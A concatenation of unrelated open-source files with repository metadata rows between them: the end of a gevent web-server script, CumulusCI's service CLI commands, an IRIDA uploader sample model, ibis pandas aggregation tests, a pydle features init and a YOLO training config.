else:
print('send_to_client error:%s' % str(e))
def save_to_cache(astr):
pass
MAX_MSGLEN = int(gConfig['webgis']['anti_bird']['max_msg_len'])
tcp_reconnect_threshold = int(gConfig['webgis']['anti_bird']['tcp_reconnect_threshold'])
recvstr = ''
while 1:
try:
if gTcpSock is None:
gTcpSock = tcp_connect()
if gTcpSock and not gTcpSock.closed:
buf = bytearray(b"\n" * MAX_MSGLEN)
gTcpSock.recv_into(buf)
recvstr += buf.strip().decode("utf-8")
if len(recvstr)>0:
gTcpReconnectCounter = 0;
print('[%s]%s' % (time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()), recvstr))
packets, recvstr = get_packets(recvstr)
if gConfig['webgis'].has_key('anti_bird') and gConfig['webgis']['anti_bird'].has_key('update_to_cache') and gConfig['webgis']['anti_bird']['update_to_cache'].lower() == 'true':
save_to_cache(packets)
send_to_client(packets)
except:
recvstr = ''
tcp_print_exception()
if gTcpSock:
if not gTcpSock.closed:
gTcpSock.close()
del gTcpSock
gTcpSock = None
gevent.sleep(0.01)
def cycles_task():
global gConfig, gJoinableQueue
if gConfig['wsgi']['application'].lower() == 'authorize_platform':
gevent.spawn(delete_expired_session, int(gConfig['authorize_platform']['session']['session_cycle_check_interval']))
elif gConfig['wsgi']['application'].lower() == 'pay_platform' and gJoinableQueue:
gevent.spawn(joinedqueue_consumer_pay)
elif gConfig['wsgi']['application'].lower() == 'chat_platform' and gJoinableQueue:
gevent.spawn(joinedqueue_consumer_chat)
elif gConfig['wsgi']['application'].lower() == 'webgis':
if gConfig['webgis']['anti_bird'].has_key('enable_fetch') and gConfig['webgis']['anti_bird']['enable_fetch'].lower() == 'true':
interval = 1
if gConfig['webgis']['anti_bird'].has_key('cycle_interval'):
interval = int(gConfig['webgis']['anti_bird']['cycle_interval'])
gevent.spawn(tcp_recv, None)
gevent.spawn(tcp_reconnect_check, interval)
def mainloop_single( port=None, enable_cluster=False, enable_ssl=False):
global gConfig
gen_model_app_cache()
server = None
app = None
key = 'application_' + gConfig['wsgi']['application']
if globals().has_key(key):
print('application ready to start:%s' % gConfig['wsgi']['application'])
app = globals()[key]
else:
print('unknown application:%s' % gConfig['wsgi']['application'])
return
cycles_task()
if port and not enable_cluster:
if enable_ssl:
print('listening at host 127.0.0.1, port %d with ssl crypted' % port)
server = pywsgi.WSGIServer(('127.0.0.1', port), app, handler_class = WebSocketHandler, keyfile = gConfig['listen_port']['keyfile'], certfile = gConfig['listen_port']['certfile'])
else:
print('listening at host 127.0.0.1, port %d' % port)
server = pywsgi.WSGIServer(('127.0.0.1', port), app, handler_class = WebSocketHandler)
server.start()
server.serve_forever()
else:
if enable_ssl:
pport = port
if not pport:
pport = gConfig['listen_port']['ssl_port']
else:
pport = port
if not pport:
pport = gConfig['listen_port']['port']
host_list = get_host_ip()
admin = ''
if enable_cluster:
admin = 'cluster manager '
print('%slistening at host %s, port %s' % (admin, str(host_list), str(pport)))
servers = []
#if gConfig['webservice']['enable'] in [u'true', u'TRUE']:
#h, p = gConfig['webservice']['host'], int(gConfig['webservice']['port'])
#print('listening webservice at http://%s:%d/webservice' % (h, p))
#server = pywsgi.WSGIServer((h, p), get_wsapplication())
#servers.append(server)
#server.start()
if len(host_list)>0:
idx = 0
if isinstance(pport, int):
for i in host_list:
if enable_ssl:
server = pywsgi.WSGIServer((i, pport), app, handler_class = WebSocketHandler, keyfile = gConfig['listen_port']['keyfile'], certfile = gConfig['listen_port']['certfile'])
else:
server = pywsgi.WSGIServer((i, pport), app, handler_class = WebSocketHandler)
servers.append(server)
if idx < len(host_list)-1:
server.start()
idx += 1
servers[-1].serve_forever()
elif isinstance(pport, unicode):
for i in host_list:
if enable_ssl:
server = pywsgi.WSGIServer((i, int(pport)), app, handler_class = WebSocketHandler, keyfile = gConfig['listen_port']['keyfile'], certfile = gConfig['listen_port']['certfile'])
else:
server = pywsgi.WSGIServer((i, int(pport)), app, handler_class = WebSocketHandler)
servers.append(server)
if idx < len(host_list)-1:
server.start()
idx += 1
servers[-1].serve_forever()
elif isinstance(pport, list):
for i in host_list:
for j in pport:
if enable_ssl:
server = pywsgi.WSGIServer((i, int(j)), app, handler_class = WebSocketHandler, keyfile = gConfig['listen_port']['keyfile'], certfile = gConfig['listen_port']['certfile'])
else:
server = pywsgi.WSGIServer((i, int(j)), app, handler_class = WebSocketHandler)
servers.append(server)
if idx < len(host_list) * len(pport)-1:
server.start()
idx += 1
servers[-1].serve_forever()
else:
print('wrong host or port in %s' % db_util.CONFIGFILE)
return server
def mainloop_nginx(popen):
while True:
stdoutdata, stderrdata = popen.communicate()
#if stdoutdata:
#queue.put(stdoutdata)
gevent.sleep(0.01)
def mainloop_manager(queue):
while True:
qget = q.get()
if qget:
print(qget)
gevent.sleep(0.01)
def create_cluster():
#global gConfig, gClusterProcess
conf = ''
with open(gConfig['cluster']['nginx_conf_template']) as f:
conf = f.read()
rg = gConfig['cluster']['port_range']
node_list = '\n'
for port in range(int(rg[0]), int(rg[1]), int(rg[2])):
node_list += ' server 127.0.0.1:%d;\n' % port
listen_port = gConfig['listen_port']['port']
access_log = gConfig['cluster']['nginx_log']
host = get_host_ip()
host.append('localhost')
server_name = ' '.join(host)
conf = conf.replace('[node_list]', str(node_list))
conf = conf.replace('[listen_port]', str(listen_port))
conf = conf.replace('[access_log]', str(access_log))
conf = conf.replace('[server_name]', str(server_name))
p = os.path.abspath(gConfig['cluster']['nginx_conf_template'])
p = os.path.join(os.path.dirname(p), 'nginx.conf')
#print(conf)
with open(p, 'w') as f:
f.write(conf)
idx = 0
for port in range(int(rg[0]), int(rg[1]), int(rg[2])):
print('process%d is starting...' % idx)
proc = Process(target=mainloop_single, args=(port, False, False))
proc.start()
#gClusterProcess[str(proc.pid)] = proc
idx += 1
print('nginx is starting...')
popen = subprocess.Popen([os.path.abspath(gConfig['cluster']['nginx_exe']), '-c', p ])
def get_pid_from_name(name):
out = subprocess.check_output(['tasklist','/SVC'])
#print(out)
l = out.split('\r\n')
findlist = []
for i in l:
arr = i.split(' ')
for j in arr:
if len(j)>0 and name in j:
for k in arr:
if arr.index(k)==0:
continue
if len(k)>0:
try:
pid = int(k)
findlist.append(pid)
break
except:
continue
break
#print(findlist)
if current_process().pid in findlist:
findlist.remove(current_process().pid)
return findlist
def kill_cluster():
#global gClusterProcess
print('kill nginx...')
for pid in get_pid_from_name('nginx'):
try:
out = subprocess.check_output(['taskkill', '/F', '/PID', str(pid), '/T'])
print(out)
except:
pass
for pid in get_pid_from_name('python'):
print('kill python.exe[%s]...' % pid)
out = subprocess.check_output(['taskkill', '/F', '/PID', str(pid), '/T'])
print(out)
#for pid in gClusterProcess.keys():
#print('kill python.exe[%s]...' % pid)
#gClusterProcess[pid].terminate()
print('kill done')
def create_self_signed_cert(cert_dir, year=10):
from OpenSSL import crypto, SSL
CERT_FILE = "ssl_certificate.crt"
KEY_FILE = "ssl_self_signed.key"
if not os.path.exists(os.path.join(cert_dir, CERT_FILE)) or not os.path.exists(os.path.join(cert_dir, KEY_FILE)):
k = crypto.PKey()
k.generate_key(crypto.TYPE_RSA, 4096)
cert = crypto.X509()
cert.get_subject().C = "AQ"
cert.get_subject().ST = "State"
cert.get_subject().L = "City"
cert.get_subject().O = "Company"
cert.get_subject().OU = "Organization"
cert.get_subject().CN = socket.gethostname()
cert.set_serial_number(1000)
cert.gmtime_adj_notBefore(0)
cert.gmtime_adj_notAfter(year*365*24*60*60)
cert.set_issuer(cert.get_subject())
cert.set_pubkey(k)
cert.sign(k, 'sha1')
with open(os.path.join(cert_dir, CERT_FILE), "wt") as f:
f.write(crypto.dump_certificate(crypto.FILETYPE_PEM, cert))
with open(os.path.join(cert_dir, KEY_FILE), "wt") as f:
f.write(crypto.dump_privatekey(crypto.FILETYPE_PEM, k))
#create_self_signed_cert('.')
print('Create SSL key and cert done')
else:
print('SSL key and cert already exist')
def gen_model_app_cache():
global gConfig
if not gConfig.has_key('web_cache'):
return
s = 'CACHE MANIFEST\n'
s += '#' + gConfig['web_cache']['version'] + '\n'
if gConfig['web_cache']['gltf_cache_enable'].lower() == u'true':
modelsdir = os.path.join(STATICRESOURCE_DIR, 'gltf')
if not os.path.exists(modelsdir):
return
l = os.listdir(modelsdir)
for i in l:
s += '/gltf/' + i + '\n'
file_or_dir_cache = gConfig['web_cache']['file_or_dir_cache']
if len(file_or_dir_cache) > 0 :
for root, dirs, files in os.walk(STATICRESOURCE_DIR, topdown=False):
for name in dirs:
if name in file_or_dir_cache:
p = os.path.join(root, name)
for root1, dirs1, files1 in os.walk(p, topdown=False):
for name1 in files1:
p1 = os.path.join(root1, name1)
p1 = p1.replace(STATICRESOURCE_DIR, '').replace('\\', '/')
s += p1 + '\n'
for name in files:
if name in file_or_dir_cache:
p = os.path.join(root, name)
p = p.replace(STATICRESOURCE_DIR, '').replace('\\', '/')
s += p + '\n'
s += 'NETWORK:\n'
s += '*\n'
with open(os.path.join(STATICRESOURCE_DIR, 'kmgd.appcache'), 'w') as f:
f.write(s)
if __name__=="__main1__":
freeze_support()
options = db_util.init_global()
#print(options)
init_global()
s = get_sign_alipay(u'dsadsadsadsadsadsa')
print(s)
print(len(s))
#print(gSecurityConfig)
#key = 'application_' + gConfig['wsgi']['application']
#if globals().has_key(key):
#app = globals()[key]
#else:
#print('unknown application:%s' % gConfig['wsgi']['application'])
if __name__=="__main__":
freeze_support()
options = db_util.init_global()
init_global()
if options.signcert_enable:
create_self_signed_cert( options.signcert_directory, options.signcert_year)
elif options.batch_download_tile_enable:
db_util.command_batch_tile_download(options)
else:
if options.cluster_enable:
mainloop_single(int(gConfig['cluster']['manager_port']), True, False)
else:
if gConfig['listen_port']['enable_ssl'].lower() == u'true':
port = 443
try:
port = int(gConfig['listen_port']['ssl_port'])
except:
pass
mainloop_single(port, False, True)
else:
mainloop_single()
class Win32ServiceHandler(object):
# no parameters are permitted; all configuration should be placed in the
# configuration file and handled in the Initialize() method
def __init__(self):
pass
# called when the service is starting
def Initialize(self, configFileName):
self.server = None
self.stopEvent = threading.Event()
self.stopRequestedEvent = threading.Event()
# called when the service is starting immediately after Initialize()
# use this to perform the work of the service; don't forget to set or check
# for the stop event or the service GUI will not respond to requests to
# stop the service
def Run(self):
#self.stopRequestedEvent.wait()
self.stopEvent.set()
init_global()
self.server = mainloop_single()
# called when the service is being stopped by the service manager GUI
def Stop(self):
self.stopRequestedEvent.set()
self.stopEvent.wait()
if self.server:
self.server.stop()
| 45.568709
| 273
| 0.569165
|
25bf64e0e63e81ecc1320268515b02375195678f
| 13,699
|
py
|
Python
|
cumulusci/cli/service.py
|
SFDO-Tooling/CumulusCI
|
08bb30eb24eae0b33cff755dfba40760317d7c0f
|
[
"BSD-3-Clause"
] | 163
|
2018-09-13T18:49:34.000Z
|
2022-03-25T08:37:15.000Z
|
cumulusci/cli/service.py
|
SFDO-Tooling/CumulusCI
|
08bb30eb24eae0b33cff755dfba40760317d7c0f
|
[
"BSD-3-Clause"
] | 1,280
|
2018-09-11T20:09:37.000Z
|
2022-03-31T18:40:21.000Z
|
cumulusci/cli/service.py
|
SFDO-Tooling/CumulusCI
|
08bb30eb24eae0b33cff755dfba40760317d7c0f
|
[
"BSD-3-Clause"
] | 93
|
2018-09-13T07:29:22.000Z
|
2022-03-26T23:15:48.000Z
|
import json
import os
from pathlib import Path
from typing import Callable, Optional
import click
from cumulusci.core.config import ServiceConfig
from cumulusci.core.exceptions import CumulusCIException, ServiceNotConfigured
from cumulusci.core.utils import import_class, import_global
from .runtime import pass_runtime
from .ui import CliTable
@click.group("service", help="Commands for connecting services to the keychain")
def service():
pass
# Commands for group: service
@service.command(name="list", help="List services available for configuration and use")
@click.option("--plain", is_flag=True, help="Print the table using plain ascii.")
@click.option("--json", "print_json", is_flag=True, help="Print a json string")
@pass_runtime(require_project=False, require_keychain=True)
def service_list(runtime, plain, print_json):
services = (
runtime.project_config.services
if runtime.project_config is not None
else runtime.universal_config.services
)
supported_service_types = list(services.keys())
supported_service_types.sort()
if print_json:
click.echo(json.dumps(services))
return None
configured_services = runtime.keychain.list_services()
plain = plain or runtime.universal_config.cli__plain_output
data = [["Default", "Type", "Name", "Description"]]
for service_type in supported_service_types:
if service_type not in configured_services:
data.append(
[False, service_type, "", services[service_type]["description"]]
)
continue
default_service_for_type = runtime.keychain._default_services.get(service_type)
description = services[service_type]["description"]
for alias in configured_services[service_type]:
data.append(
[
alias == default_service_for_type,
service_type,
alias,
description,
]
)
rows_to_dim = [row_index for row_index, row in enumerate(data) if not row[2]]
table = CliTable(
data,
title="Services",
dim_rows=rows_to_dim,
)
table.echo(plain)
class ConnectServiceCommand(click.MultiCommand):
def _get_services_config(self, runtime):
return (
runtime.project_config.services
if runtime.project_config
else runtime.universal_config.services
)
def list_commands(self, ctx):
"""list the services that can be configured"""
runtime = ctx.obj
services = self._get_services_config(runtime)
return sorted(services.keys())
def _build_param(self, attribute: str, details: dict) -> click.Option:
req = details["required"]
default_factory: Optional[Callable] = self._get_callable_default(
details.get("default_factory")
)
prompt = None if default_factory else req
kwargs = {
"prompt": prompt,
"required": req,
"help": details.get("description"),
"default": default_factory,
}
return click.Option((f"--{attribute}",), **kwargs)
def _get_callable_default(self, default_factory_path) -> Optional[Callable]:
"""
Given a class_path, return a callable providing a default value for click.Option.
"""
default_factory: Optional[Callable] = None
if default_factory_path:
default_factory = import_global(default_factory_path)
return default_factory
def _get_default_options(self, runtime):
options = []
options.append(
click.Option(
("--default",),
is_flag=True,
help="Set this service as the global default.",
)
)
if runtime.project_config is not None:
options.append(
click.Option(
("--project",),
is_flag=True,
help="Set this service as the default for this project only.",
)
)
return options
def get_command(self, ctx, service_type):
runtime = ctx.obj
runtime._load_keychain()
services = self._get_services_config(runtime)
try:
service_config = services[service_type]
except KeyError:
raise click.UsageError(
f"Sorry, I don't know about the '{service_type}' service."
)
attributes = service_config["attributes"].items()
params = [self._build_param(attr, cnfg) for attr, cnfg in attributes]
params.extend(self._get_default_options(runtime))
def callback(*args, **kwargs):
service_name = kwargs.get("service_name")
if not service_name:
click.echo(
"No service name specified. Using 'default' as the service name."
)
service_name = "default"
configured_services = runtime.keychain.list_services()
if (
service_type in configured_services
and service_name in configured_services[service_type]
):
click.confirm(
f"There is already a {service_type}:{service_name} service. Do you want to overwrite it?",
abort=True,
)
prompt_to_default_service = f"A default service already exists for service type {service_type}. Would you like to set this service as the new default?"
default_service_exists = (
True
if runtime.keychain.get_default_service_name(service_type) is not None
else False
)
set_as_default = default_service_exists and click.confirm(
prompt_to_default_service
)
if runtime.project_config is None:
set_project_default = False
else:
set_project_default = kwargs.pop("project", False)
set_global_default = kwargs.pop("default", False)
serv_conf = dict(
(k, v) for k, v in list(kwargs.items()) if v is not None
) # remove None values
# A service can define a callable to validate the service config
validator_path = service_config.get("validator")
if validator_path:
validator = import_global(validator_path)
updated_conf: dict = validator(serv_conf)
if updated_conf:
serv_conf.update(updated_conf)
ConfigClass = ServiceConfig
if "class_path" in service_config:
class_path = service_config["class_path"]
try:
ConfigClass = import_class(class_path)
except (AttributeError, ModuleNotFoundError):
raise CumulusCIException(
f"Unrecognized class_path for service: {class_path}"
)
# Establish OAuth2 connection if required by this service
if hasattr(ConfigClass, "connect"):
oauth_dict = ConfigClass.connect(runtime.keychain, kwargs)
serv_conf.update(oauth_dict)
config_instance = ConfigClass(serv_conf, service_name, runtime.keychain)
runtime.keychain.set_service(
service_type,
service_name,
config_instance,
)
click.echo(f"Service {service_type}:{service_name} is now connected")
if set_as_default:
runtime.keychain.set_default_service(service_type, service_name)
click.echo(
f"Service {service_type}:{service_name} is now the default for service type: {service_type}."
)
if set_global_default:
runtime.keychain.set_default_service(
service_type, service_name, project=False
)
click.echo(
f"Service {service_type}:{service_name} is now the default for all CumulusCI projects"
)
if set_project_default:
runtime.keychain.set_default_service(
service_type, service_name, project=True
)
project_name = runtime.project_config.project__name
click.echo(
f"Service {service_type}:{service_name} is now the default for project '{project_name}'"
)
params.append(click.Argument(["service_name"], required=False))
return click.Command(service_type, params=params, callback=callback)
@service.command(
cls=ConnectServiceCommand,
name="connect",
help="Connect an external service to CumulusCI",
)
def service_connect():
pass
@service.command(name="info", help="Show the details of a connected service")
@click.argument("service_type")
@click.argument("service_name", required=False)
@click.option("--plain", is_flag=True, help="Print the table using plain ascii.")
@pass_runtime(require_project=False, require_keychain=True)
def service_info(runtime, service_type, service_name, plain):
try:
plain = plain or runtime.universal_config.cli__plain_output
service_config = runtime.keychain.get_service(service_type, service_name)
service_data = [["Key", "Value"]]
service_data.extend(
[
[click.style(k, bold=True), str(v)]
for k, v in service_config.config.items()
if k != "service_name"
]
)
default_service = runtime.keychain.get_default_service_name(service_type)
service_name = default_service if not service_name else service_name
service_table = CliTable(service_data, title=f"{service_type}:{service_name}")
service_table.echo(plain)
except ServiceNotConfigured:
click.echo(
f"{service_type} is not configured for this project. Use service connect {service_type} to configure."
)
@service.command(
name="default", help="Set the default service for a given service type."
)
@click.argument("service_type")
@click.argument("service_name")
@click.option(
"--project",
is_flag=True,
help="Sets the service as the default for the current project.",
)
@pass_runtime(require_project=False, require_keychain=True)
def service_default(runtime, service_type, service_name, project):
try:
runtime.keychain.set_default_service(service_type, service_name, project)
except ServiceNotConfigured as e:
click.echo(f"An error occurred setting the default service: {e}")
return
if project:
project_name = Path(runtime.keychain.project_local_dir).name
click.echo(
f"Service {service_type}:{service_name} is now the default for project '{project_name}'"
)
else:
click.echo(
f"Service {service_type}:{service_name} is now the default for all CumulusCI projects"
)
@service.command(name="rename", help="Rename a service")
@click.argument("service_type")
@click.argument("current_name")
@click.argument("new_name")
@pass_runtime(require_project=False, require_keychain=True)
def service_rename(runtime, service_type, current_name, new_name):
try:
runtime.keychain.rename_service(service_type, current_name, new_name)
except ServiceNotConfigured as e:
click.echo(f"An error occurred renaming the service: {e}")
return
click.echo(f"Service {service_type}:{current_name} has been renamed to {new_name}")
@service.command(name="remove", help="Remove a service")
@click.argument("service_type")
@click.argument("service_name")
@pass_runtime(require_project=False, require_keychain=True)
def service_remove(runtime, service_type, service_name):
# cannot remove services defined via env vars
env_var_name = (
f"{runtime.keychain.env_service_var_prefix}{service_type}__{service_name}"
)
if os.environ.get(env_var_name):
message = (
f"The service {service_type}:{service_name} is defined by environment variables. "
f"If you would like it removed please delete the environment variable with name: {env_var_name}"
)
click.echo(message)
return
new_default = None
if len(
runtime.keychain.services.get(service_type, {}).keys()
) > 2 and service_name == runtime.keychain._default_services.get(service_type):
click.echo(
f"The service you would like to remove is currently the default for {service_type} services."
)
click.echo("Your other services of the same type are:")
for alias in runtime.keychain.list_services()[service_type]:
if alias != service_name:
click.echo(alias)
new_default = click.prompt(
"Enter the name of the service you would like as the new default"
)
if new_default not in runtime.keychain.list_services()[service_type]:
click.echo(f"No service of type {service_type} with name: {new_default}")
return
try:
runtime.keychain.remove_service(service_type, service_name)
if new_default:
runtime.keychain.set_default_service(service_type, new_default)
except ServiceNotConfigured as e:
click.echo(f"An error occurred removing the service: {e}")
return
click.echo(f"Service {service_type}:{service_name} has been removed.")
| 37.842541
| 163
| 0.628294
|
0532d73c938a1ee33d7f7889b9bf3affbabc5a55
| 2,983
|
py
|
Python
|
model/sample.py
|
telatin/qi-irida-uploader
|
c3e64857dd8d02045062afbf0eb9f9989951a429
|
[
"Apache-2.0"
] | 1
|
2019-04-10T12:37:00.000Z
|
2019-04-10T12:37:00.000Z
|
model/sample.py
|
telatin/qi-irida-uploader
|
c3e64857dd8d02045062afbf0eb9f9989951a429
|
[
"Apache-2.0"
] | null | null | null |
model/sample.py
|
telatin/qi-irida-uploader
|
c3e64857dd8d02045062afbf0eb9f9989951a429
|
[
"Apache-2.0"
] | 2
|
2019-04-10T11:58:24.000Z
|
2020-02-07T17:06:17.000Z
|
"""
A Sample will store (key: value) pairs using a dictionary.
Keys from a sequencer include: 'sampleName','description'
Keys from Irida will include these AND many others
"""
from cerberus import Validator, TypeDefinition
from copy import deepcopy
from .sequence_file import SequenceFile
class Sample:
# Define SequenceFile as a type for validation
_sample_type = TypeDefinition('sequence_file', (SequenceFile,), ())
Validator.types_mapping['sequence_file'] = _sample_type
uploadable_schema = {'_sequence_file': {
'type': 'sequence_file',
'nullable': False,
'required': True,
},
'_sample_name': {
'type': 'string',
'nullable': False,
'required': True,
'minlength': 3 # Minimum sample name length is 3
},
'_description': {
'type': 'string',
'nullable': True,
'required': False
},
'_sample_number': {
'anyof_type': ['string', 'integer'],
'nullable': True,
'required': False
}}
def __init__(self, sample_name, description='', sample_number=None, samp_dict=None):
self._sample_name = sample_name
self._description = description
self._sample_number = sample_number
if samp_dict is None:
samp_dict = {}
self._sample_dict = dict(samp_dict)
self._sequence_file = None
@property
def sample_name(self):
return self._sample_name
@property
def description(self):
return self._description
@property
def sample_number(self):
return self._sample_number
@property
def sequence_file(self):
return self._sequence_file
@sequence_file.setter
def sequence_file(self, sq):
self._sequence_file = sq
def get_irida_id(self):
if "identifier" in self._sample_dict:
return self.get("identifier")
else:
return None
def get_uploadable_dict(self): # formatting for sending to irida when creating a project
uploadable_dict = deepcopy(self._sample_dict)
uploadable_dict['sampleName'] = self.sample_name
uploadable_dict['description'] = self.description
return uploadable_dict
def __getitem__(self, key):
if key in self._sample_dict:
return self._sample_dict[key]
return None
def get(self, key):
return self.__getitem__(key)
def __str__(self):
return str(self.get_uploadable_dict) + str(self.sequence_file)
def get_dict(self):
return self.__dict__
| 31.072917
| 93
| 0.552464
|
7786bcfd48c992c2046454a1b9ba51f9cfa0a079
| 3,975
|
py
|
Python
|
ibis/backends/pandas/tests/test_aggcontext.py
|
GrapeBaBa/ibis
|
507bb14efdcfd719a0487ee23fe1c85c177517f6
|
[
"Apache-2.0"
] | 986
|
2017-06-07T07:33:01.000Z
|
2022-03-31T13:00:46.000Z
|
ibis/backends/pandas/tests/test_aggcontext.py
|
GrapeBaBa/ibis
|
507bb14efdcfd719a0487ee23fe1c85c177517f6
|
[
"Apache-2.0"
] | 2,623
|
2017-06-07T18:29:11.000Z
|
2022-03-31T20:27:31.000Z
|
ibis/backends/pandas/tests/test_aggcontext.py
|
GrapeBaBa/ibis
|
507bb14efdcfd719a0487ee23fe1c85c177517f6
|
[
"Apache-2.0"
] | 238
|
2017-06-26T19:02:58.000Z
|
2022-03-31T15:18:29.000Z
|
import numpy as np
import pandas as pd
import pytest
from pandas.util import testing as tm
from pytest import param
from ..aggcontext import Summarize, window_agg_udf
df = pd.DataFrame(
{
'id': [1, 2, 1, 2],
'v1': [1.0, 2.0, 3.0, 4.0],
'v2': [10.0, 20.0, 30.0, 40.0],
}
)
@pytest.mark.parametrize(
('agg_fn', 'expected_fn'),
[
param(
lambda v1: v1.mean(),
lambda df: df['v1'].mean(),
id='udf',
),
param(
'mean',
lambda df: df['v1'].mean(),
id='string',
),
],
)
def test_summarize_single_series(agg_fn, expected_fn):
"""Test Summarize.agg operating on a single Series."""
aggcontext = Summarize()
result = aggcontext.agg(df['v1'], agg_fn)
expected = expected_fn(df)
assert result == expected
@pytest.mark.parametrize(
('agg_fn', 'expected_fn'),
[
param(
lambda v1: v1.mean(),
lambda df: df['v1'].mean(),
id='udf',
),
param(
'mean',
lambda df: df['v1'].mean(),
id='string',
),
],
)
def test_summarize_single_seriesgroupby(agg_fn, expected_fn):
"""Test Summarize.agg operating on a single SeriesGroupBy."""
aggcontext = Summarize()
df_grouped = df.sort_values('id').groupby('id')
result = aggcontext.agg(df_grouped['v1'], agg_fn)
expected = expected_fn(df_grouped)
tm.assert_series_equal(result, expected)
@pytest.mark.parametrize(
('agg_fn', 'expected_fn'),
[
param(
lambda v1, v2: v1.mean() - v2.mean(),
lambda df: df['v1'].mean() - df['v2'].mean(),
id='two-column',
),
# Two columns, but only the second one is actually used in UDF
param(
lambda v1, v2: v2.mean(),
lambda df: df['v2'].mean(),
id='redundant-column',
),
],
)
def test_summarize_multiple_series(agg_fn, expected_fn):
"""Test Summarize.agg operating on many Series."""
aggcontext = Summarize()
args = [df['v1'], df['v2']]
result = aggcontext.agg(args[0], agg_fn, *args[1:])
expected = expected_fn(df)
assert result == expected
@pytest.mark.parametrize(
'param',
[
(
pd.Series([True, True, True, True]),
pd.Series([1.0, 2.0, 2.0, 3.0]),
),
(
pd.Series([False, True, True, False]),
pd.Series([np.NaN, 2.0, 2.0, np.NaN]),
),
],
)
def test_window_agg_udf(param):
"""Test passing custom window indices for window aggregation."""
mask, expected = param
grouped_data = df.sort_values('id').groupby('id')['v1']
result_index = grouped_data.obj.index
window_lower_indices = pd.Series([0, 0, 2, 2])
window_upper_indices = pd.Series([1, 2, 3, 4])
result = window_agg_udf(
grouped_data,
lambda s: s.mean(),
window_lower_indices,
window_upper_indices,
mask,
result_index,
dtype='float',
max_lookback=None,
)
expected.index = grouped_data.obj.index
tm.assert_series_equal(result, expected)
def test_window_agg_udf_different_freq():
"""Test that window_agg_udf works when the window series and data series
have different frequencies.
"""
time = pd.Series([pd.Timestamp('20200101'), pd.Timestamp('20200201')])
data = pd.Series([1, 2, 3, 4, 5, 6])
window_lower_indices = pd.Series([0, 4])
window_upper_indices = pd.Series([5, 7])
mask = pd.Series([True, True])
result_index = time.index
result = window_agg_udf(
data,
lambda s: s.mean(),
window_lower_indices,
window_upper_indices,
mask,
result_index,
'float',
None,
)
expected = pd.Series([data.iloc[0:5].mean(), data.iloc[4:7].mean()])
tm.assert_series_equal(result, expected)
| 23.802395
| 76
| 0.562767
|
c87f883e259e68fae1024be49a65e850a4f4dcd8
| 591
|
py
|
Python
|
pydle/features/__init__.py
|
Rixxan/pydle
|
6ec21f0167d99fbe1faef02ca03c12c0d7c0db99
|
[
"BSD-3-Clause"
] | 150
|
2015-02-18T04:19:16.000Z
|
2022-03-29T20:39:45.000Z
|
pydle/features/__init__.py
|
Rixxan/pydle
|
6ec21f0167d99fbe1faef02ca03c12c0d7c0db99
|
[
"BSD-3-Clause"
] | 112
|
2015-04-18T02:48:38.000Z
|
2022-03-28T03:50:44.000Z
|
pydle/features/__init__.py
|
Rixxan/pydle
|
6ec21f0167d99fbe1faef02ca03c12c0d7c0db99
|
[
"BSD-3-Clause"
] | 51
|
2015-01-30T19:40:30.000Z
|
2022-03-22T07:32:29.000Z
|
from . import rfc1459, account, ctcp, tls, isupport, whox, ircv3
from .rfc1459 import RFC1459Support
from .account import AccountSupport
from .ctcp import CTCPSupport
from .tls import TLSSupport
from .isupport import ISUPPORTSupport
from .whox import WHOXSupport
from .ircv3 import IRCv3Support, IRCv3_1Support, IRCv3_2Support
from .rpl_whoishost import RplWhoisHostSupport
ALL = [IRCv3Support, WHOXSupport, ISUPPORTSupport, CTCPSupport, AccountSupport, TLSSupport, RFC1459Support,
RplWhoisHostSupport]
LITE = [WHOXSupport, ISUPPORTSupport, CTCPSupport, TLSSupport, RFC1459Support]
| 39.4
| 107
| 0.824027
|
3e22a833db655b96f026370c6d4f4acfddd327fe
| 2,132
|
py
|
Python
|
yolo_asff/configs.py
|
HirataYurina/yoloV3-keras-sibyl
|
15f6c5f021dfc80d753df6bcdd579ae1139edfb9
|
[
"MIT"
] | 6
|
2020-08-30T15:00:24.000Z
|
2021-12-08T02:46:45.000Z
|
yolo_asff/configs.py
|
HirataYurina/yoloV3-keras-sibyl
|
15f6c5f021dfc80d753df6bcdd579ae1139edfb9
|
[
"MIT"
] | 1
|
2021-12-21T14:02:34.000Z
|
2021-12-21T14:03:06.000Z
|
yolo_asff/configs.py
|
HirataYurina/yoloV3-keras-sibyl
|
15f6c5f021dfc80d753df6bcdd579ae1139edfb9
|
[
"MIT"
] | null | null | null |
# -*- coding:utf-8 -*-
# author:平手友梨奈ii
# e-mail:1353593259@qq.com
# datetime:1993/12/01
# filename:configs.py
# software: PyCharm
import easydict
CONFIG = easydict.EasyDict()
# evaluation
CONFIG.DETECT = easydict.EasyDict()
CONFIG.DETECT.SCORE = 0.3
CONFIG.DETECT.IOU = 0.43
CONFIG.DETECT.RESOLUTION = (416, 416)
CONFIG.DETECT.mAP_THRES = 0.85
# prediction
CONFIG.PREDICT = easydict.EasyDict()
CONFIG.PREDICT.WEIGHTS = '../logs/gaussian_yolo3/ep340-loss-5.042.h5'
CONFIG.PREDICT.ANCHOR_PATH = '../model_data/yolo_anchors.txt'
CONFIG.PREDICT.CLASS_PATH = '../model_data/danger_source_classes.txt'
CONFIG.PREDICT.SCORE = 0.3
CONFIG.PREDICT.IOU = 0.43
CONFIG.PREDICT.RESOLUTION = (416, 416)
CONFIG.PREDICT.MAX_BOXES = 40
# train
CONFIG.TRAIN = easydict.EasyDict()
CONFIG.TRAIN.LR_STAGE = 0.001
CONFIG.TRAIN.BATCH = 4 # it is depending on you GPU memory
CONFIG.TRAIN.EPOCH = 350 # it is enough for transfer training in stage 1
CONFIG.TRAIN.IOU_THRESHOLD = 0.3
# CONFIG.TRAIN.COS_INTERVAL = [0.05, 0.15, 0.30, 0.50] # cosine anneal
CONFIG.TRAIN.COS_INTERVAL = [0.01] # cosine anneal
CONFIG.TRAIN.ANNO_PATH = '../2088_trainval.txt'
CONFIG.TRAIN.VALID_PATH = '../2088_test.txt'
CONFIG.TRAIN.TEST_PATH = ''
CONFIG.TRAIN.CLASS_PATH = '../model_data/danger_source_classes.txt'
CONFIG.TRAIN.ANCHOR_PATH = '../model_data/yolo_anchors.txt'
CONFIG.TRAIN.PRE_TRAINED_MODEL = '../logs/yolo3_weights.h5'
CONFIG.TRAIN.SAVE_PATH = '../logs/yolo_asff/'
CONFIG.TRAIN.SAVE_PERIOD = 10
CONFIG.TRAIN.RESOLUTION = (416, 416)
CONFIG.TRAIN.IGNORE_THRES = 0.7
CONFIG.TRAIN.CONFIDENCE_FOCAL = False
